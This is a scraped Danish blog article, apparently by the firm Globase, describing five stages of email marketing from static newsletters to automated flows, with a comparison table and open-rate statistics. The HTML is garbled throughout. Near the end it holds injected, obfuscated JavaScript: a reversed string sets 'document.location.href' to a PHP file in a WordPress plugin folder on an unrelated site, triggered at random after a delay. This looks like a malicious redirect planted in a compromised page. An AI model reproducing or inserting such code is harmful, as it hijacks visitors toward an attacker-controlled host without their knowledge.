#1: Evolutionen i e-mailmarketing.
Ambitioner om øgede konverteringsrater tvinger os op ad det, man kan kalde e-mailmarketing-disciplinens udviklingstrin. Er det en personalisering i form af ”Kære [fornavnet på din modtager]”, en tilpasning af indholdet til modtagerens interesser eller tidligere udviste adfærd – eller et fuldt automatiseret e-mail flow, der har den afgørende betydning? Indsats kontra afkast afvejes. Målet er en konvertering.
Med vores e-mails ønsker vi naturligvis som afsender at konvertere klik i e-mailen til et salg eller en anden handling, øge vores kundedatabase og fastholde vores eksisterende kunder. toftheday/”>Adskillige målinger viser, at e-mailmarketing stadig er vores bedste og mest effektive redskab til at nå dette mål. Men målingerne viser også, at det måske er på tide at slibe vores bedste våben. Er vi rykket med udviklingen – eller hvad kræver det af os, hvis vi ønsker at tage næste skridt?
Få overblikket her:
top; padding: 15px;”>Evolutionstrin i e-mailmarketing | top; padding: 15px;”>Hvad betyder udtrykket? | top; padding: 15px;”>Hvad kræver det af virksomheden at bruge denne form for e-mailmarketing? | top; padding: 15px;”>Hvad er udbyttet for virksomheden/kunden? |
top; padding: 15px;”>1. Statiske e-mails | top; padding: 15px;”>Du sender samme nyhedsbrev/e-mail til hele din modtager-database. | top; padding: 15px;”>Du skal have indsamlet e-mailadresser på; dine modtagere og herefter importere listen til et e-mailmarketingsystem. | top; padding: 15px;”>Du sikrer dig, at kunden husker jeres tilstedeværelse som leverandører. De generiske e-mails er dog i højrisikozonen for at blive afmeldt, da indhold nemt kan anses for irrelevant, da samme historie fortælles til alle. Husk at sikre dig permissions. |
top; padding: 15px;”>2. Segmenterede e-mails | top; padding: 15px;”>Du skriver flere udgaver af dit nyhedsbrev målrettet til de segmenter, dine modtagere er opdelt i. Indholdet er grundlæggende stadig statisk. | top; padding: 15px;”>Du skal inddele dine modtagere i grupper, der minder om hinanden i forhold til det produkt/ den service, som de tilbydes. | top; padding: 15px;”>Der er forskellige årsager til, at kunder køber/ikke køber. Det tager den segmenterede kundeliste hensyn til. Tilbud og indhold tilpasset din kunde øger konverteringsraten. |
top; padding: 15px;”>3. Personaliserede e-mails | top; padding: 15px;”>Du fletter fx fornavnet på dine modtagere ind i nyhedsbrevet. | top; padding: 15px;”>Din modtagerliste skal indeholde modtagerens navn. | top; padding: 15px;”>Ifølge Experian Marketing Services er åbningsraten 6 gange højere, hvis e-mailen er gjort personlig. Med dette trick kommer du nemt et mulehår foran konkurrenterne, da personalisering faktisk ikke er så udbredt endnu. Dette også selvom alle undersøgelser peger på, at selv den mest simple form for personalisering virker, hvis anvendt korrekt. |
top; padding: 15px;”>4. Dynamiske e-mails | top; padding: 15px;”>Indholdet skræddersys til dine modtagere på baggrund af deres stamdata, adfærd eller ønsker til indhold. Hvis din modtager fx. har vist interesse for et emne i det ene nyhedsbrev, er emnet flyttet til toppen i næste nyhedsbrev. | top; padding: 15px;”>Din modtagerliste skal indeholde modtagerens navn. Indholdet i e-mailen skræddersys, fx i forhold til hvilke produkter/services der er søgt efter på hjemmesiden, eller i forhold til emner, der er afkrydset ved tilmelding til nyhedsbrevet. |
top; padding: 15px;”>Sandsynligheden for, e-mailen læses af modtageren stiger markant, da den opfattes som relevant pga. personligt tilpasset indhold. Dermed stiger kendskab og loyalitet til din virksomhed, hvilket øger konverteringsraten. |
top; padding: 15px;”>5. Automatiserede e-mails | top; padding: 15px;”>Dine emails udsendes automatisk – baseret på modtagerens handlinger/adfærd. | top; padding: 15px;”>Du skal skabe et automatiseret flow af e-mails, hvor du griber modtageren alt efter deres handling og adfærd. Det kræver en indsats, men når du har gjort benarbejdet, behøver du kun at tilføje og optimere. Vi kommer til at skrive mere om marketing automation i vores kommende artikler, så følg med her, hvis det er relevant for dig. | top; padding: 15px;”>Modtageren får relevant og rettidigt indhold pga. en handling/adfærd, som de har udvist. E-mailen bliver åbnet, læst, og du får skabt en relation.
Automatiserede e-mails er både effektive ved kampagnesalg, til at opbygge et salg eller til at skabe mersalg. |
Undersøgelser viser, at i forhold til de generiske e-mails har de segmenterede e-mails en åbningsrate, der er over 14 % højere, med 100 % flere klik og 9 % færre afmeldinger. Det er måske derfor en god idé at (gen)overveje indsats kontra afkast.
to, Oxygen-Sans, Ubuntu, Cantarell, ‘Helvetica Neue’, sans-serif;”>
Læs også:
tomation.html”>E-mailmarketing: En introduktion: #2 Marketing Automation
”Vil
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom” text_color=”#ffffff” title_tag=”h3″ controls=”bottom” btn_link=”url:http%3A%2F%2Fwww.globase.dk%2Fkontakt|||” btn_label=”Kontakt os nu!” btn_style=”outlined” btn_color=”white”]Skal Globase hjælpe dig på vej med de enkelte trin i din e-mailmarketing?